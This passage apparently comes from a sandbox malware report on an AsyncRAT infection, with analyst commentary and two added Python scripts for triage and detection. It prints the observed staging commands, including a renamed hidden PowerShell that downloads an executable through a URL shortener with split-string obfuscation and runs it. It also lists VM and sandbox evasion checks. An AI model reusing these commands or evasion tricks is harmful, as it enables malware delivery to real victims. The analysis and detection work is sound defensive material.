SbieDll.dll is the user-mode DLL that Sandboxie loads into every sandboxed process; the string sits in the same vc.exe memory region (0x2B41000) that produced the AsyncRAT Yara match above, so this is the payload's own anti-analysis check rather than an artifact of the PowerShell stager.
Source: C:\Users\user\AppData\Local\Temp\o.exe Thread delayed: delay time: 922337203685477 (6 identical entries collapsed)
Source: C:\Users\user\AppData\Roaming\vc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe Window / User API: threadDelayed 891
Source: C:\Users\user\AppData\Local\Temp\o.exe Window / User API: threadDelayed 809
Source: C:\Users\user\AppData\Local\Temp\o.exe Window / User API: threadDelayed 1424
Source: C:\Users\user\AppData\Local\Temp\o.exe Window / User API: threadDelayed 460
Source: C:\Users\user\AppData\Local\Temp\o.exe Window / User API: threadDelayed 1335
Source: C:\Users\user\AppData\Local\Temp\o.exe Window / User API: threadDelayed 422
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6132 Thread sleep count: 891 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2044 Thread sleep count: 809 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1872 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2124 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6740 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2220 Thread sleep count: 1424 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6136 Thread sleep count: 460 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1264 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6732 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6664 Thread sleep count: 1335 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6620 Thread sleep count: 422 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6128 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6128 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 4276 Thread sleep count: 93 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\vc.exe TID: 3216 Thread sleep time: -922337203685477s >= -30000s
The value 922337203685477 (and its multiples above) is the Int64 extreme in 100 ns kernel ticks expressed in milliseconds, i.e. an infinite wait such as INFINITE or TimeSpan.MaxValue, not a measured sleep interval; the negative sign is NtDelayExecution's relative-interval convention. o.exe executes PowerShell command lines and loads the PowerShell host assemblies, so these unbounded waits can come from the runtime itself and are weaker evidence of evasion than the explicit Start-Sleep 7 and Start-Sleep 12 in its command lines.
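To separate the infinite waits from real delays when reading entries like the ones above, the following parser classifies each "Thread delayed" / "Thread sleep" line per process. It is an added example, not Joe Sandbox code; the sample lines are copied verbatim from this report (including the glued "Jump to behavior" link text), while the millisecond unit for finite values and the 30 s threshold are assumptions taken from the report's own "-30000s" comparison value.

```python
"""Parse 'Thread delayed' / 'Thread sleep' entries from a Joe Sandbox style report
and separate infinite waits from measured sleeps and sleep loops.

Added example, not Joe Sandbox code.  SAMPLE is copied from the report's evasion
section; the millisecond unit for finite values and the 30 s threshold are assumptions.
"""
import re
from collections import defaultdict

# Int64 extreme in 100 ns ticks, in ms: how an INFINITE / TimeSpan.MaxValue wait
# appears once the kernel's relative interval is converted to milliseconds.
INFINITE_MS = (1 << 63) // 10_000          # 922337203685477
LONG_SLEEP_MS = 30_000                     # assumed: the report compares against -30000

ENTRY = re.compile(
    r"Source:\s+(?P<proc>\S+?\.exe)\s*(?:TID:\s*(?P<tid>\d+))?\s*Thread "
    r"(?P<kind>delayed: delay time|sleep time|sleep count): (?P<val>-?\d+)")

# Constructed input: lines copied from the report, glued link text left in place.
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\o.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\vc.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6132Thread sleep count: 891 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2044Thread sleep count: 809 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1872Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2124Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6740Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1264Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 4276Thread sleep count: 93 > 30
Source: C:\Users\user\AppData\Roaming\vc.exe TID: 3216Thread sleep time: -922337203685477s >= -30000s
"""


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(value: int) -> str:
    """Relative kernel waits are negative; only the magnitude matters here."""
    magnitude = abs(value)
    if magnitude >= INFINITE_MS:
        return "infinite"      # unbounded wait, e.g. a host thread blocking forever
    if magnitude >= LONG_SLEEP_MS:
        return "long"          # a real delay long enough to outlast a short sandbox run
    return "short"


def summarize(report_text: str) -> dict:
    """Per process: wait classes, total iterations of sleep loops, thread ids seen."""
    per_proc = defaultdict(lambda: {"infinite": 0, "long": 0, "short": 0,
                                    "loop_iterations": 0, "tids": set()})
    for m in ENTRY.finditer(report_text):
        rec = per_proc[basename(m["proc"])]
        value = int(m["val"])
        if m["kind"] == "sleep count":
            rec["loop_iterations"] += value   # many sub-threshold sleeps chained in a loop
        else:
            rec[classify(value)] += 1
        if m["tid"]:
            rec["tids"].add(int(m["tid"]))
    return {proc: {**rec, "tids": sorted(rec["tids"])} for proc, rec in per_proc.items()}


if __name__ == "__main__":
    for proc, rec in summarize(SAMPLE).items():
        print(proc, rec)
```

Run on the sample, o.exe shows four infinite waits, one sleep at exactly the threshold and 1793 loop iterations spread over short sleeps; vc.exe shows only infinite waits. The loop counts, not the infinite waits, are the part worth correlating with the Start-Sleep calls in the command lines.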
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (2 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Code function: 14_2_0125C197 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free, 14_2_0125C197
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\powershell.exe
Source: o.exe, 00000010.00000002.397800415.000000000565B000.00000004.00000001.sdmp, o.exe, 00000011.00000002.423626227.0000000004AA7000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: vc.exe, 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp Binary or memory string: vmware
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp, o.exe, 00000010.00000002.397427961.0000000005592000.00000004.00000001.sdmp, o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp Binary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: vc.exe, 00000020.00000002.534814534.0000000007661000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWH
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
The Hyper-V strings in o.exe come from the PowerShell module directory path (C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V) that the PowerShell host enumerates, and the Hyper-V sentences in vc.exe read like Windows system error-message text for the Host Compute Service; only the vmware string, which sits in the same vc.exe region (0x2B41000) as the SBIEDLL.DLL string and the AsyncRAT Yara match, points to a VM check written into the payload.
Source: C:\Users\user\AppData\Local\Temp\o.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe Process token adjusted: Debug (3 identical entries collapsed)
Source: C:\Users\user\AppData\Roaming\vc.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\o.exe Code function: 14_2_01259E90 SetUnhandledExceptionFilter, 14_2_01259E90
Source: C:\Users\user\AppData\Local\Temp\o.exe Code function: 14_2_01259BEC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_01259BEC
Source: C:\Users\user\AppData\Local\Temp\o.exe Memory allocated: page read and write | page guard
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Users\user\AppData\Local\Temp\o.exe Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Read together, these six process creations are the whole staging chain: cmd.exe has Robocopy copy powershell.exe into %TEMP%, the copy is then executed from there as o.exe with -w 1 (the numeric form of -WindowStyle Hidden) so that rules keyed on the powershell.exe process name do not fire, the first o.exe invocation fetches vc.exe through the tinyurl.com shortener with the URL split as 'htt'+'ps' to defeat plain string matching, the second moves it to %APPDATA% after a 7 s delay, and the third runs it after a further 12 s; vc.exe is the process that produced the AsyncRAT Yara match above.
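The checks a detection engineer would want for the six process creations listed above, run over constructed process-creation records. This is an added example, not Joe Sandbox code: the record layout (parent image, image, command line, as a Sysmon event ID 1 carries them) is an assumption, the command lines in SAMPLE_EVENTS are copied from this report, and the benign control event at the end is made up.

```python
"""Detection checks for the renamed-PowerShell staging chain, run over constructed
process-creation records.  Added example, not Joe Sandbox code: the record layout
is an assumption, the malicious command lines are copied from the report, and the
final benign control event is constructed.
"""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


PS_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
COPY_TOOLS = {"robocopy.exe", "xcopy.exe", "cmd.exe", "esentutl.exe"}
URL_SHORTENERS = ("tinyurl.com", "bit.ly", "is.gd", "cutt.ly", "t.co/")
# Cmdlets and members that only make sense inside a PowerShell host.
PS_SYNTAX = re.compile(
    r"\b(New-Object|DownloadFile|DownloadString|Start-Sleep|Move-Item|Invoke-Expression|IEX)\b", re.I)
# '-w 1' is the numeric spelling of '-WindowStyle Hidden'.
HIDDEN_WINDOW = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)
# Two string literals glued with '+', the 'htt'+'ps' trick.
STRING_CONCAT = re.compile(r"""["'][^"']*["']\s*\+\s*["'][^"']*["']""")
PS_SYSTEM_DIR = re.compile(r"WindowsPowerShell\\v1\.0", re.I)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> List[str]:
    """Names of every check the event trips, in a fixed order (empty for clean events)."""
    img, cl = basename(ev.image), ev.command_line
    hits = []
    if USER_WRITABLE.search(ev.image):
        hits.append("executable launched from user-writable path")
    if USER_WRITABLE.search(ev.parent_image):
        hits.append("parent process runs from user-writable path")
    if img in COPY_TOOLS and PS_SYSTEM_DIR.search(cl) and USER_WRITABLE.search(cl):
        hits.append("powershell.exe copied into user-writable path")
    if img not in PS_HOSTS and PS_SYNTAX.search(cl):
        hits.append("PowerShell syntax run by a non-PowerShell image name")
    if HIDDEN_WINDOW.search(cl):
        hits.append("hidden window (-w 1)")
    if any(s in cl.lower() for s in URL_SHORTENERS):
        hits.append("download via URL shortener")
    if STRING_CONCAT.search(cl):
        hits.append("string-concatenation obfuscation")
    return hits


def triage(events) -> dict:
    """Command line -> findings for every event that trips at least one check."""
    findings = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            findings[ev.command_line] = hits
    return findings


CMD = r"C:\Windows\SysWOW64\cmd.exe"
O_EXE = r"C:\Users\user\AppData\Local\Temp\o.exe"
SAMPLE_EVENTS = [
    ProcEvent(CMD, r"C:\Windows\SysWOW64\Robocopy.exe",
              r"robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z"),
    ProcEvent(CMD, r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 1"),
    ProcEvent(CMD, O_EXE, O_EXE + r" -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')"),
    ProcEvent(CMD, O_EXE, O_EXE + r" -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'"),
    ProcEvent(CMD, O_EXE, O_EXE + r" -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;"),
    ProcEvent(O_EXE, r"C:\Users\user\AppData\Roaming\vc.exe", r"C:\Users\user\AppData\Roaming\vc.exe"),
    # Constructed benign control: plain PowerShell launched from its system directory.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS).items():
        print(cmdline, "->", hits)
```

Five of the seven records trip at least one check and the benign control trips none. On a live host the strongest single signal is not in the command line at all: the copied binary keeps its version resource, so Sysmon's OriginalFileName field still reads PowerShell.EXE for o.exe, and a rule comparing that field with the on-disk image name catches the rename regardless of what the script does.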
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp Binary or memory string: Progman
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\o.exe Code function: GetLocaleInfoW,wcsncmp, 14_2_0125D111
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation (5 identical entries collapsed)
Source: C:\Windows\SysWOW64\Robocopy.exe Queries volume information: C:\ VolumeInformation (2 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (9 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (15 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (9 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\ VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Users\user\AppData\Roaming\vc.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
